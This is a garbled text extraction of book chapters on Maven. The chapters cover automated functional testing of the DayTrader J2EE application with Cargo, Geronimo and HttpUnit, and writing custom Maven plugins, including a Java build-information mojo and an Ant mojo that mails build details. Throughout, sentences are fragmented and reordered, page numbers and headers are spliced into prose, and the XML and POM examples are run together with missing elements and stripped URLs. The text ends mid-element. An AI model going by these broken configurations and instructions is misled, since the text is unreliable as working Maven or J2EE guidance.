.jar [INFO] [INFO] `-> daytrader-wsappclient-1. Since Geronimo 1.0-SNAPSHOT.0/car If you need to undeploy the DayTrader version that you've built above you'll use the “Trade” identifier instead: C:\apps\geronimo-1.0-tomcat\bin>deploy undeploy Trade 125 .war [INFO] [INFO] `-> daytrader-ejb-1.0-SNAPSHOT.0-SNAPSHOT. start your preinstalled version of Geronimo and run mvn exec:exec: C:\dev\m2book\code\j2ee\daytrader\ear>mvn exec:exec [. You will need to make sure that the DayTrader application is not already deployed before running the exec:exec goal or it will fail.jar [INFO] [INFO] `-> daytrader-streamer-1.0-tomcat\bin>deploy stop geronimo/daytrader-derby-tomcat/1.0 comes with the DayTrader application bundled.. you should first stop it.jar [INFO] [INFO] `-> TradeDataSource [INFO] [INFO] `-> TradeJMS You can now access the DayTrader application by opening your browser to.] [INFO] [exec:exec] [INFO] Deployed Trade [INFO] [INFO] `-> daytrader-web-1.Building J2EE Applications First.0-SNAPSHOT. by creating a new execution of the Exec plugin or run the following: C:\apps\geronimo-1.
Figure 4-13: The new functional-tests module amongst the other DayTrader modules You need to add this module to the list of modules in the daytrader/pom.Better Builds with Maven 4.xml so that it's built along with the others. see Chapter 7. modify.13. Testing J2EE Application In this last section you'll learn how to automate functional testing of the EAR built previously. At the time of writing. Maven only supports integration and functional testing by creating a separate module. create a functional-tests module as shown in Figure 4-13. To achieve this. so you can define a profile to build the functional-tests module only on demand. 126 . Functional tests can take a long time to execute. For example.
take a look in the functional-tests module itself. but running mvn install -Pfunctional-test will. • The Geronimo deployment Plan file is located in src/deployment/geronimo/plan.xml. Figure 4-14: Directory structure for the functional-tests module As this module does not generate an artifact. the packaging should be defined as pom. Figure 4-1 shows how it is organized: • Functional tests are put in src/it/java.Building J2EE Applications This means that running mvn install will not build the functional-tests module. so these need to be configured in the functional-tests/pom. the compiler and Surefire plugins are not triggered during the build life cycle of projects with a pom packaging.xml file: 127 . • Classpath resources required for the tests are put in src/it/resources (this particular example doesn't have any resources). Now. However.
samples.apache.] </plugins> </build> </project> 128 .plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <executions> <execution> <goals> <goal>testCompile</goal> </goals> </execution> </executions> </plugin> <plugin> <groupId>org.maven.geronimo.0.maven...apache.Better Builds with Maven <project> <modelVersion>4.daytrader</groupId> <artifactId>daytrader</artifactId> <version>1..apache.apache.0-SNAPSHOT</version> <type>ear</type> <scope>provided</scope> </dependency> [.geronimo.0-SNAPSHOT</version> </parent> <artifactId>daytrader-tests</artifactId> <name>DayTrader :: Functional Tests</name> <packaging>pom</packaging> <description>DayTrader Functional Tests</description> <dependencies> <dependency> <groupId>org.samples.daytrader</groupId> <artifactId>daytrader-ear</artifactId> <version>1.plugins</groupId> <artifactId>maven-surefire-plugin</artifactId> <executions> <execution> <phase>integration-test</phase> <goals> <goal>test</goal> </goals> </execution> </executions> </plugin> [.0</modelVersion> <parent> <groupId>org..] </dependencies> <build> <testSourceDirectory>src/it</testSourceDirectory> <plugins> <plugin> <groupId>org.
you'll bind the Cargo plugin's start and deploy goals to the preintegration-test phase and the stop goal to the postintegration-test phase. thus ensuring the proper order of execution.codehaus. you will usually utilize a real database in a known state.cargo</groupId> <artifactId>cargo-ant</artifactId> <version>0. and it is started automatically by Geronimo.8</version> <scope>test</scope> </dependency> </dependencies> 129 .8</version> <scope>test</scope> </dependency> <dependency> <groupId>org. It also ensures that the daytrader-ear module is built before running the functional-tests build when the full DayTrader build is executed from the toplevel in daytrader/. In addition. You're going to use the Cargo plugin to start Geronimo and deploy the EAR into it. To set up your database you can use the DBUnit Java API (see. This is because the EAR artifact is needed to execute the functional tests.xml file: <project> [. For integration and functional tests. You may be asking how to start the container and deploy the DayTrader EAR into it.codehaus.Building J2EE Applications As you can see there is also a dependency on the daytrader-ear module. However. so DBUnit is not needed to perform any database operations.. Start by adding the Cargo dependencies to the functional-tests/pom.net/). there's a DayTrader Web page that loads test data into the database.] <dependency> <groupId>org. Derby is the default database configured in the deployment plan.cargo</groupId> <artifactId>cargo-core-uberjar</artifactId> <version>0. As the Surefire plugin's test goal has been bound to the integration-test phase above.sourceforge.] <dependencies> [.. in the case of the DayTrader application...
0.apache. It is configured to deploy the EAR using the Geronimo Plan file.Better Builds with Maven Then create an execution element to bind the Cargo plugin's start and deploy goals: <build> <plugins> [.daytrader</groupId> <artifactId>daytrader-ear</artifactId> <type>ear</type> <properties> <plan>${basedir}/src/deployment/geronimo/plan.] <plugin> <groupId>org..samples.] The deployer element is used to configure the Cargo plugin's deploy goal.xml</plan> </properties> <pingURL></pingURL> </deployable> </deployables> </deployer> </configuration> </execution> [.codehaus...0/ geronimo-tomcat-j2ee-1..geronimo. In addition.apache.org/dist/geronimo/1. thus ensuring that the EAR is ready for servicing when the tests execute. 130 .cargo</groupId> <artifactId>cargo-maven2-plugin</artifactId> <configuration> <wait>false</wait> <container> <containerId>geronimo1x</containerId> <zipUrlInstaller> <url>. a pingURL element is specified so that Cargo will ping the specified URL till it responds.
8.net/) to call a Web page from the DayTrader application and check that it's working.1</version> <scope>test</scope> </dependency> 131 .6. with both defined using a test scope.. by wrapping it in a JUnit TestSetup class to start the container in setUp() and stop it in tearDown().1</version> <scope>test</scope> </dependency> <dependency> <groupId>httpunit</groupId> <artifactId>httpunit</artifactId> <version>1. as you're only using them for testing: <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3. Add the JUnit and HttpUnit dependencies. An alternative to using Cargo's Maven plugin is to use the Cargo Java API directly from your tests.. You're going to use the HttpUnit testing framework ( J2EE Applications Last. The only thing left to do is to add the tests in src/it/java.] <execution> <id>stop-container</id> <phase>post-integration-test</phase> <goals> <goal>stop</goal> </goals> </execution> </executions> </plugin> </plugins> </build> </project> The functional test scaffolding is now ready. add an execution element to bind the Cargo plugin's stop goal to the post-integration-test phase: [.
response. public class FunctionalTest extends TestCase { public void testDisplayMainPage() throws Exception { WebConversation wc = new WebConversation(). WebRequest request = new GetMethodWebRequest( "").Better Builds with Maven Next. In addition you've discovered how to automate starting and stopping containers. Errors: 0.geronimo. 132 . and more.*.geronimo. how to gather project health information from your builds. Summary You have learned from chapters 1 and 2 how to build any type of application and this chapter has demonstrated how to build J2EE applications.getResponse(request). import junit.14. type mvn install and relax: C:\dev\m2book\code\j2ee\daytrader\functional-tests>mvn install [. WebResponse response = wc.. add a JUnit test class called src/it/java/org/apache/geronimo/samples/daytrader/FunctionalTest. } } It's time to reap the benefits from your build.apache. Change directory into functional-tests. assertEquals("DayTrader".apache.samples. At this stage you've pretty much become an expert Maven user! The following chapters will show even more advanced topics such as how to write Maven plugins.FunctionalTest [surefire] Tests run: 1.httpunit. Time elapsed: 0.framework.getTitle()).daytrader.*.meterware. the URL is called to verify that the returned page has a title of “DayTrader”: package org.daytrader.531 sec [INFO] [cargo:stop {execution: stop-container}] 4..samples. import com.] effectively set up Maven in a team. deploying J2EE archives and implementing functional tests. Failures: 0. In the class.java.
Richard Feynman 133 . Developing Custom Maven Plugins Developing Custom Maven Plugins This chapter covers: • • • • • How plugins execute in the Maven life cycle Tools and languages available to aid plugin developers Implementing a basic plugin using Java and Ant Working with dependencies. reality must take precedence over public relations.5. for Nature cannot be fooled. source directories. and resources from a plugin Attaching an artifact to the project For a successful technology. .
This chapter will focus on the task of writing custom plugins. the common theme for these tasks is the function of compiling code. if your project requires tasks that have no corresponding plugin. it traverses the phases of the life cycle in order. This association of mojos to phases is called binding and is described in detail below. the maven-compiler-plugin incorporates two mojos: compile and testCompile. Additionally. When a number of mojos perform related tasks. the plugins provided “out of the box” by Maven are enough to satisfy the needs of most build processes (see Appendix A for a list of default plugins used to build a typical project). A mojo is the basic unit of work in the Maven application. injecting runtime parameter information. Maven's core APIs handle the “heavy lifting” associated with loading project definitions (POMs). the build process for a project is comprised of set of mojos executing in a particular. Recall that a mojo represents a single task in the build process. of the build process are executed by the set of plugins associated with the phases of a project's build life-cycle. including a review of plugin terminology and the basic mechanics of the the Maven plugin framework. called phases. This makes Maven's plugin framework extremely important as a means of not only building a project. Such supplemental plugins can be found at the Apache Maven project. Correspondingly. executing all the associated mojos at each phase of the build. When Maven executes a build. 134 . resolving dependencies. it is still likely that a plugin already exists to perform this task. It starts by describing fundamentals. Maven is actually a platform that executes plugins within a build life cycle. it will discuss the various ways that a plugin can interact with the Maven build environment and explore some examples. This ordering is called the build life cycle. Packaging these mojos inside a single plugin provides a consistent access mechanism for users. but also extending a project's build to incorporate new functionality. In this case. and is defined as a set of task categories. With most projects.2. it enables these mojos to share common code more easily.Better Builds with Maven 5.1. The actual functional tasks. 5. refer to the Plugin Matrix. it may be necessary to write a custom plugin to integrate these tasks into the build life cycle. they are packaged together into a plugin. Just like Java packages. Finally. It executes an atomic build task that represents a single step in the build process. resolving project dependencies. the loosely affiliated CodeHaus Mojo project. and organizing and running plugins. in order to perform the tasks necessary to build a project. and more. Each mojo can leverage the rich infrastructure provided by Maven for loading projects. or even at the Web sites of third-party tools offering Maven integration by way of their own plugins (for a list of some additional plugins available for use. well-defined order. the chapter will cover the tools available to simplify the life of the plugin developer. plugins provide a grouping mechanism for multiple mojos that serve similar functions within the build life cycle. For example. or work. let's begin by reviewing the terminology used to describe a plugin and its role in the build. Even if a project requires a special task to be performed. However. Introduction As described in Chapter 2. A Review of Plugin Terminology Before delving into the details of how Maven plugins function and how they are written. such as integration with external tools and systems. From there. allowing shared configuration to be added to a single section of the POM.
Each execution can specify a separate phase binding for its declared set of mojos. to ensure compatibility with other plugins. dependency management. successive phases can make assumptions about what work has taken place in the previous phases. a mojo can pick and choose what elements of the build state it requires in order to execute its task. While Maven does in fact define three different lifecycles. Therefore. you will also need a good understanding of how plugins are structured and how they interact with their environment. since they often perform tasks for the POM maintainer. before a mojo can execute. Using the life cycle. Such mojos may be meant to check out a project from version control. Think of these mojos as tangential to the the Maven build process. mojos have a natural phase binding which determines when a task should execute within the life cycle. As a plugin developer. parameter injection and life-cycle binding form the cornerstone for all mojo development. so be sure to check the documentation for a mojo before you re-bind it. Bootstrapping into Plugin Development In addition to understanding Maven's plugin terminology. which is used for the majority of build activities (the other two life cycles deal with cleaning a project's work directory and generating a project web site). which correspond to the phases of the build life cycle. 5. The Plugin Framework Maven provides a rich framework for its plugins.Developing Custom Maven Plugins Together with phase binding. Indeed. or aid integration with external development tools. and as such. 5. Maven also provides a welldefined procedure for building a project's sources into a distributable archive. Using Maven's parameter injection infrastructure. While mojos usually specify a default phase binding. the discussion in this chapter is restricted to the default life cycle. Together. A discussion of all three build life cycles can be found in Appendix A. a mojo may be designed to work outside the context of the build life cycle. in addition to determining its appropriate phase binding.1. a given mojo can even be bound to the life cycle multiple times during a single build. sequencing the various build operations. plus much more. the ordered execution of Maven's life cycle gives coherence to the build process. or even create the directory structure for a new project. However. Binding to a phase of the Maven life cycle allows a mojo to make assumptions based upon what has happened in the preceding phases. it may still require that certain activities have already been completed. using the plugin executions section of the project's POM. 135 . Since phase bindings provide a grouping mechanism for mojos within the life cycle. In some cases. Most mojos fall into a few general categories.3.3. will not have a life-cycle phase binding at all since they don't fall into any natural category within a typical build process. including a well-defined build life cycle. it is important to provide the appropriate phase binding for your mojos. you must understand the mechanics of life-cycle phase binding and parameter injection. and parameter resolution and injection. These mojos are meant to be used by way of direct invocation. Understanding this framework will enable you to extract the Maven build-state information that each mojo requires. they can be bound to any phase in the life cycle. As a result.
Then. the compile mojo from the maven-compiler-plugin will compile the source code into binary class files in the output directory. Indeed. This is not a feature of the framework. First.. is often as important as the modifications made during execution itself. then two additional mojos will be triggered to handle unit testing. As a specific example of how plugins work together through the life cycle. 136 . determining when not to execute. but until now they had nothing to do and therefore. providing functions as varied as deployment into the repository system. If this basic Maven project also includes source code for unit tests. did not execute. many more plugins can be used to augment the default life-cycle definition. the jar mojo from the maven-jarplugin will harvest these class files and archive them into a jar file. validation of project content. each of the resource-related mojos will discover this lack of non-code resources and simply opt out without modifying the build in any way. Maven will execute a default life cycle for the 'jar' packaging. Instead. at least two of the above mojos will be invoked. The testCompile mojo from the maven-compiler-plugin will compile the test sources. This level of extensibility is part of what makes Maven so powerful. generation of the project's website.Better Builds with Maven Participation in the build life cycle Most plugins consist entirely of mojos that are bound at various phases in the life cycle according to their function in the build process. Depending on the needs of a given project. Since our hypothetical project has no “non-code” resources. Maven's plugin framework ensures that almost anything can be integrated into the build life cycle. then the test mojo from the maven-surefire-plugin will execute those compiled tests. but a requirement of a well-designed mojo. and much more. none of the mojos from the maven-resources-plugin will be executed. These mojos were always present in the life-cycle definition. Only those mojos with tasks to perform are executed during this build. During this build process. In good mojo design. consider a very basic Maven build: a project with source code that should be compiled and archived into a jar file for redistribution.
Maven allows mojos to specify parameters whose values are extracted from the build state using expressions. and the resulting value is injected into the mojo. see Appendix A. Environment information – which is more static. they require information about the state of the current build. At runtime. a mojo that applies patches to the project source code will need to know where to find the project source and patch files. under the path /META-INF/maven/plugin. along with any system properties that were provided when Maven was launched. the expression associated with a parameter is resolved against the current build state.Developing Custom Maven Plugins Accessing build information In order for mojos to execute effectively. 137 .compileSourceRoots} Then. how do you instruct Maven to instantiate a given mojo in the first place? The answers to these questions lie in the plugin descriptor. see Appendix A.xml. and consists of the user. It contains information about the mojo's implementation class (or its path within the plugin jar). until now you have not seen exactly how a life-cycle binding occurs. For example. and once resolved. That is to say. Using the correct parameter expressions.and machinelevel Maven settings. how do you associate mojo parameters with their expression counterparts. and the mechanism for injecting the parameter value into the mojo instance. This information comes in two categories: • Project information – which is derived from the project POM. using a language-appropriate mechanism. and what methods Maven uses to extract mojo parameters from the build state. each declared mojo parameter includes information about the various expressions used to resolve its value. • To gain access to the current build state. in addition to any programmatic modifications made by previous mojo executions. thereby avoiding traversal of the entire build-state object graph. the set of parameters the mojo declares. whether it is required for the mojo's execution. the expression to retrieve that information might look as follows: ${patchDirectory} For more information about which mojo expressions are built into Maven. This mojo would retrieve the list of source directories from the current build information using the following expression: ${project. The descriptor is an XML file that informs Maven about the set of mojos that are contained within the plugin. and more. The Maven plugin descriptor is a file that is embedded in the plugin jar archive. whether it is editable. The plugin descriptor Though you have learned about binding mojos to life-cycle phases and resolving parameter values using associated expressions. assuming the patch directory is specified as mojo configuration inside the POM. the life-cycle phase to which the mojo should be bound. Within this descriptor. For the complete plugin descriptor syntax. a mojo can keep its dependency list to a bare minimum. how do you instruct Maven to inject those values into the mojo instance? Further.
Writing a plugin descriptor by hand demands that plugin developers understand low-level details about the Maven plugin framework – details that the developer will not use. the format used to write a mojo's metadata is dependent upon the language in which the mojo is implemented. it consists of a framework library which is complemented by a set of provider libraries (generally. This metadata is embedded directly in the mojo's source code where possible. it's a simple case of providing special javadoc annotations to identify the properties and parameters of the mojo. this flexibility comes at a price. one per supported mojo language). By abstracting many of these details away from the plugin developer. to generate the plugin descriptor). • Of course. For example. POM configurations.2.verbose}" default-value="false" */ private boolean verbose. Plugin Development Tools To simplify the creation of plugin descriptors. and direct invocations (as from the command line). 138 . Maven's development tools expose only relevant specifications in a format convenient for a given plugin's implementation language. except when configuring the descriptor. so it can be referenced from lifecycle mappings. In short. However. the maven-plugin-plugin simply augments the standard jar life cycle mentioned previously as a resource-generating step (this means the standard process of turning project sources into a distributable jar archive is modified only slightly. it uses a complex syntax.Better Builds with Maven The plugin descriptor is very powerful in its ability to capture the wiring information for a wide variety of mojos. Maven provides plugin tools to parse mojo metadata from a variety of formats. adding any other plugin-level metadata through its own configuration (which can be modified in the plugin's POM). Maven's plugindevelopment tools remove the burden of maintaining mojo metadata by hand. This is where Maven's plugin development tools come into play. The clean mojo also defines the following: /** * Be verbose in the debug log-level? * * @parameter expression="${clean. 5. These plugindevelopment tools are divided into the following two categories: • The plugin extractor framework – which knows how to parse the metadata formats for every language supported by Maven. The maven-plugin-plugin – which uses the plugin extractor framework. To accommodate the extensive variability required from the plugin descriptor. and orchestrates the process of extracting metadata from mojo implementations. the clean mojo in the maven-cleanplugin provides the following class-level javadoc annotation: /** * @goal clean */ public class CleanMojo extends AbstractMojo This annotation tells the plugin-development tools the mojo's name.3. and its format is specific to the mojo's implementation language. This framework generates both plugin documentation and the coveted plugin descriptor. Using Java.
But consider what would happen if the default value you wanted to inject contained a parameter expression. consider the following field annotation from the resources mojo in the maven-resources-plugin: /** * Directory containing the classes. The first specifies that this parameter's default value should be set to false. it's implicit when using the @parameter annotation.build. it might seem counter-intuitive to initialize the default value of a Java field using a javadoc annotation. the underlying principles remain the same. For a complete list of javadoc annotations available for specifying mojo metadata. which references the output directory for the current project. these annotations are specific to mojos written in Java. This parameter annotation also specifies two attributes. 139 . especially when you could just declare the field as follows: private boolean verbose = false. expression and default-value.File instance.io. * * @parameter default-value="${project. namely the java. then the mechanism for specifying mojo metadata such as parameter definitions will be different. The second specifies that this parameter can also be configured from the command line as follows: -Dclean. it's impossible to initialize the Java field with the value you need. When the mojo is instantiated. However. this value is resolved based on the POM and injected into this field. Since the plugin tools can also generate documentation about plugins based on these annotations. At first. it's a good idea to consistently specify the parameter's default value in the metadata.Developing Custom Maven Plugins Here.outputDirectory}" */ private File classesDirectory. like Ant. For instance. If you choose to write mojos in another language. Remember. it specifies that this parameter can be configured from the POM using: <configuration> <verbose>false</verbose> </configuration> You may notice that this configuration name isn't explicitly specified in the annotation. rather than in the Java field initialization code.verbose=false Moreover. see Appendix A. the annotation identifies this field as a mojo parameter. In this case.
This project can be found in the source code that accompanies this book. you risk confusing the issue at hand – namely. In these cases. in certain cases you may find it easier to use Ant scripts to perform build tasks.3. the specific snapshot versions of dependencies used in the build. and so on. 5. For many mojo developers. Ant-based plugins can consist of multiple mojos mapped to a single build script. and minimizes the number of dependencies you will have on Maven's core APIs.. To facilitate these examples. which is used to read and write build information metadata files. individual mojos each mapped to separate scripts. Whatever language you use. This is especially important during migration. when translating a project build from Ant to Maven (refer to Chapter 8 for more discussion about migrating from Ant to Maven). the particular feature of the mojo framework currently under discussion. this technique also works well for Beanshell-based mojos. Otherwise. this chapter will also provide an example of basic plugin development using Ant. Ant. For example. and because many Maven-built projects are written in Java. it's important to keep the examples clean and relatively simple. In addition. Maven lets you select pieces of the build state to inject as mojo parameters. During the early phases of such a migration. or any combination thereof. Maven can accommodate mojos written in virtually any language. Therefore. due to the migration value of Ant-based mojos when converting a build to Maven. A Note on the Examples in this Chapter When learning how to interact with the different aspects of Maven from within a mojo. called buildinfo. Maven can wrap an Ant build target and use it as if it were a mojo. Plugin parameters can be injected via either field reflection or setter methods. You can install it using the following simple command: mvn install 140 . Since Java is currently the easiest language for plugin development. To make Ant scripts reusable. mojo mappings and parameter definitions are declared via an associated metadata file.Better Builds with Maven Choose your mojo implementation language Through its flexible plugin descriptor format and invocation framework. Java is the language of choice. the examples in this chapter will focus on a relatively simple problem space: gathering and publishing information about a particular build. Since it provides easy reuse of third-party APIs from within your mojo. Simple javadoc annotations give the plugin processing plugin (the maven-plugin-plugin) the instructions required to generate a descriptor for your mojo. Maven currently supports mojos written in Java. Since Beanshell behaves in a similar way to standard Java. it is often simpler to wrap existing Ant build targets with Maven mojos and bind them to various phases in the life cycle. this chapter will focus primarily on plugin development in this language.3. and Beanshell. it also provides good alignment of skill sets when developing mojos from scratch. Such information might include details about the system environment. you will need to work with an external project. However.
which will be deployed to the Maven repository system. since it can have a critical effect on the build process and the composition of the resulting Guinea Pig artifacts. reusable utility in many different scenarios.4.1. When triggered. by separating the generator from the Maven binding code. 5. Prerequisite: Building the buildinfo generator project Before writing the buildinfo plugin. this approach encapsulates an important best practice.4. Here. and take advantage of a single. consider a case where the POM contains a profile. providing a thin adapter layer that allows the generator to be run from a Maven build. This development effort will have the task of maintaining information about builds that are deployed to the development repository. perform the following steps: cd buildinfo mvn install 141 . eventually publishing it alongside the project's artifact in the repository for future reference (refer to Chapter 7 for more details on how teams use Maven). BuildInfo Example: Capturing Information with a Java Mojo To begin. The buildinfo plugin is a simple wrapper around this generator. As a side note. In addition to simply capturing build-time information. and this dependency is injected by one of the aforementioned profiles. Capturing this information is key. you are free to write any sort of adapter or front-end code you wish. This information should capture relevant details about the environment used to build the Guinea Pig artifacts. which will be triggered by the value of a given system property – say. this profile adds a new dependency on a Linux-specific library.name is set to the value Linux (for more information on profiles. called Guinea Pig. then the value of the triggering system property – and the profile it triggers – could reasonably determine whether the build succeeds or fails. When this profile is not triggered. Developing Your First Mojo For the purposes of this chapter. Therefore. this dependency is used only during testing. To build the buildinfo generator library. and has no impact on transitive dependencies for users of this project. if the system property os. the values of system properties used in the build are clearly very important. for the purposes of debugging. which allows the build to succeed in that environment.Developing Custom Maven Plugins 5. refer to Chapter 3). it makes sense to publish the value of this particular system property in a build information file so that others can see the aspects of the environment that affected this build. you will look at the development effort surrounding a sample project. you will need to disseminate the build to the rest of the development team. For simplicity. a default profile injects a dependency on a windows-specific library. you must first install the buildinfo generator library into your Maven local repository. If you have a test dependency which contains a defect.
you'll find a basic POM and a sample mojo. It can be found in the plugin's project directory.Better Builds with Maven Using the archetype plugin to generate a stub plugin project Now that the buildinfo generator library has been installed. 142 .mergere.] /** * Write environment information for the current build to file.systemProperties}" */ private String systemProperties. you will need to modify the POM as follows: • Change the name element to Maven BuildInfo Plugin. Once you have the plugin's project structure in place. writing your custom mojo is simple. fairly simple Java-based mojo: [. • Remove the url element. Inside. as you know more about your mojos' dependencies. you should remove the sample mojo. Finally. This is a result of the Velocity template. simply execute the following: mvn archetype:create -DgroupId=com. interacting with Maven's own plugin parameter annotations. /** * The location to write the buildinfo file. it's helpful to jump-start the plugin-writing process by using Maven's archetype plugin to create a simple stub project from a standard pluginproject template. used to generate the plugin source code. For the purposes of this plugin..build. You will modify the POM again later.plugins \ -DartifactId=maven-buildinfo-plugin \ -DarchetypeArtifactId=maven-archetype-mojo When you run this command. * This is a comma-delimited list. since this plugin doesn't currently have an associated web site. The mojo You can handle this scenario using the following. This message does not indicate a problem. * @parameter expression="${buildinfo. under the following path: src\main\java\com\mergere\mvnbook\plugins\MyMojo. However.mvnbook. you're likely to see a warning message saying “${project. To generate a stub plugin project for the buildinfo plugin. since you will be creating your own mojo from scratch.. * @goal extract * @phase package */ public class WriteBuildInfoMojo extends AbstractMojo { /** * Determines which system properties are added to the file.java. this simple version will suffice for now.directory} is not a valid reference”. This will create a project with the standard layout under a new subdirectory called mavenbuildinfo-plugin within the current working directory.
} } } While the code for this mojo is fairly straightforward. Properties sysprops = System.artifactId}-${project." ). outputFile ).outputDirectory}/${project.getProperty( key.split( ". In the class-level javadoc comment.trim(). BuildInfoConstants. } } try { BuildInfoUtils.addSystemProperty( key.length. it's worthwhile to take a closer look at the javadoc annotations. value ). i++ ) { String key = keys[i].build. Reason: " + e. for ( int i = 0.writeXml( buildInfo. if ( systemProperties != null ) { String[] keys = systemProperties. } catch ( IOException e ) { throw new MojoExecutionException( "Error writing buildinfo XML file.MISSING_INFO_PLACEHOLDER ). String value = sysprops.getProperties(). buildInfo.xml" * @required */ private File outputFile. e ). i < keys.outputFile}" defaultvalue="${project.Developing Custom Maven Plugins * @parameter expression="${buildinfo.version}buildinfo. public void execute() throws MojoExecutionException { BuildInfo buildInfo = new BuildInfo().getMessage(). there are two special annotations: /** * @goal extract * @phase package */ 143 .
Therefore. you can specify the name of this parameter when it's referenced from the command line. you have several field-level javadoc comments.build. as follows: localhost $ mvn buildinfo:extract \ -Dbuildinfo.Better Builds with Maven The first annotation. This is where the expression attribute comes into play. it makes sense to execute this mojo in the package phase. Each offers a slightly different insight into parameter specification. the mojo cannot function unless it knows where to write the build information file. 144 . since you have more specific requirements for this parameter. using several expressions to extract project information on-demand.version}buildinfo. which are used to specify the mojo's parameters. To ensure that this parameter has a value. If this parameter has no value when the mojo is configured. @goal. you can see why the normal Java field initialization is not used. as execution without an output file would be pointless.version. The default output path is constructed directly inside the annotation. Take another look: /** * The location to write the buildinfo file. you may want to allow a user to specify which system properties to include in the build information file.systemProperties=java. However.xml" * * @required */ In this case. the outputFile parameter presents a slightly more complex example of parameter annotation. In this case. Using the expression attribute.artifactId}-${project. the mojo uses the @required annotation. the complexity is justified. with no attributes. The second annotation tells Maven where in the build life cycle this mojo should be executed. In this example. In this case. consider the parameter for the systemProperties variable: /** * @parameter expression="${buildinfo. In general.dir Finally. In addition. you're collecting information from the environment with the intent of distributing it alongside the main project artifact in the repository.systemProperties}" */ This is one of the simplest possible parameter specifications. Aside from the class-level comment. When you invoke this mojo. Using the @parameter annotation by itself. you want the mojo to use a certain value – calculated from the project's information – as a default value for this parameter. tells the plugin tools to treat this class as a mojo named extract.outputFile}" defaultvalue="${project.user. the expression attribute allows you to specify a list of system properties on-the-fly. First. * * @parameter expression="${buildinfo. However. the build will fail with an error. so they will be considered separately. you will use this name. will allow this mojo field to be configured using the plugin configuration specified in the POM. so it will be ready to attach to the project artifact.directory}/${project. attaching to the package phase also gives you the best chance of capturing all of the modifications made to the build state before the jar is produced.
145 . This mapping is a slightly modified version of the one used for the jar packaging.mergere. which simply adds plugin descriptor extraction and generation to the build process.plugins</groupId> <artifactId>maven-buildinfo-plugin</artifactId> <version>1.0</version> </dependency> <dependency> <groupId>com.0.0</modelVersion> <groupId>com.0-SNAPSHOT</version> </dependency> </dependencies> </project> This POM declares the project's identity and its two dependencies. you can construct an equally simple POM which will allow you to build the plugin. note the packaging – specified as maven-plugin – which means that this plugin build will follow the maven-plugin life-cycle mapping. as follows: <project> <modelVersion>4. which provides the parsing and formatting utilities for the build information file.maven</groupId> <artifactId>maven-plugin-api</artifactId> <version>2.Developing Custom Maven Plugins The plugin POM Once the mojo has been written.0-SNAPSHOT</version> <packaging>maven-plugin</packaging> <dependencies> <dependency> <groupId>org. Also.apache. Note the dependency on the buildinfo project.mergere.mvnbook.mvnbook.shared</groupId> <artifactId>buildinfo</artifactId> <version>1.
and capture the os. </plugins> .... as follows: <build> .mvnbook. </build> The above binding will execute the extract mojo from your new maven-buildinfo-plugin during the package phase of the life cycle.Better Builds with Maven Binding to the life cycle Now that you have a method of capturing build-time environmental information.java.. The easiest way to guarantee this is to bind the extract mojo to the life cycle.name system property.mergere. so that every build triggers it. This involves modification of the standard jar life-cycle.. you need to ensure that every build captures this information. <plugins> <plugin> <groupId>com.plugins</groupId> <artifactId>maven-buildinfo-plugin</artifactId> <executions> <execution> <id>extract</id> <configuration> <systemProperties>os. which you can do by adding the configuration of the new plugin to the Guinea Pig POM.name.. 146 .version</systemProperties> </configuration> <goals> <goal>extract</goal> </goals> </execution> </executions> </plugin> .
Your mojo has captured the name of operating system being used to execute the build and the version of the jvm.0-SNAPSHOT-buildinfo. test the plugin by building Guinea Pig with the buildinfo plugin bound to its life cycle as follows: > C:\book-projects\guinea-pig > mvn package When the Guinea Pig build executes. you should see output similar to the following: [.. build the buildinfo plugin with the following commands: > C:\book-projects\maven-buildinfo-plugin > mvn clean install Next.name>Linux</os.version>1.4</java.xml In the file.] [buildinfo:extract {execution:extract}] ------------------------------------------------------------------BUILD SUCCESSFUL ------------------------------------------------------------------- Under the target directory. 147 . and both of these properties can have profound effects on binary compatibility... you will find information similar to the following: <?xml version="1.version> </systemProperties> </buildinfo> While the name of the OS may differ. you can build the plugin and try it out! First.. there should be a file named: guinea-pig-1.name> <java.Developing Custom Maven Plugins The output Now that you have a mojo and a POM. the output of of the generated build information is clear enough.] [INFO] [INFO] [INFO] [INFO] [.0" encoding="UTF-8"?><buildinfo> <systemProperties> <os.
it's simpler to use Ant. so that other team members have access to it. and how. therefore. For now. Of course.outputFile}"> <to>${listAddr}</to> </mail> </target> </project> If you're familiar with Ant. BuildInfo Example: Notifying Other Developers with an Ant Mojo Now that some important information has been captured. you'll notice that this mojo expects several project properties. However. Information like the to: address will have to be dynamic. Your new mojo will be in a file called notify. After writing the Ant target to send the notification e-mail.name}" mailhost="${mailHost}" mailport="${mailPort}" messagefile="${buildinfo.Better Builds with Maven 5. and should look similar to the following: <project> <target name="notify-target"> <mail from="maven@localhost" replyto="${listAddr}" subject="Build Info for Deployment of ${project.2. and the dozens of well-tested. To ensure these project properties are in place within the Ant Project instance. such a task could be handled using a Java-based mojo and the JavaMail API from Sun. it's a simple matter of specifying where the email should be sent. The Ant target To leverage the output of the mojo from the previous example – the build information file – you can use that content as the body of the e-mail. it might be enough to send a notification e-mail to the project development mailing list. 148 .xml. From here. mature tasks available for build script use (including one specifically for sending e-mails). “deployment” is defined as injecting the project artifact into the Maven repository system. you just need to write a mojo definition to wire the new target into Maven's build process. it should be extracted directly from the POM for the project we're building.build. you need to share it with others in your team when the resulting project artifact is deployed. given the amount of setup and code required. It's important to remember that in the Maven world. simply declare mojo parameters for them.4.
]]></description> <parameters> <parameter> <name>buildinfo. the build script was called notify. which is associated to the build script using a naming convention.Developing Custom Maven Plugins The mojo metadata file Unlike the prior Java examples.build. The corresponding metadata file will be called notify.directory}/${project. In this example.xml and should appear as follows: <pluginMetadata> <mojos> <mojo> <call>notify-target</call> <goal>notify</goal> <phase>deploy</phase> <description><![CDATA[ Email environment information from the current build to the development mailing list when the artifact is deployed.xml.xml </defaultValue> <required>true</required> <readonly>false</readonly> </parameter> <parameter> <name>listAddr</name> <required>true</required> </parameter> <parameter> <name .name</name> <defaultValue>${project.mojos. metadata for an Ant mojo is stored in a separate file.version}-buildinfo.artifactId}${project.build.outputFile</name> <defaultValue> ${project.
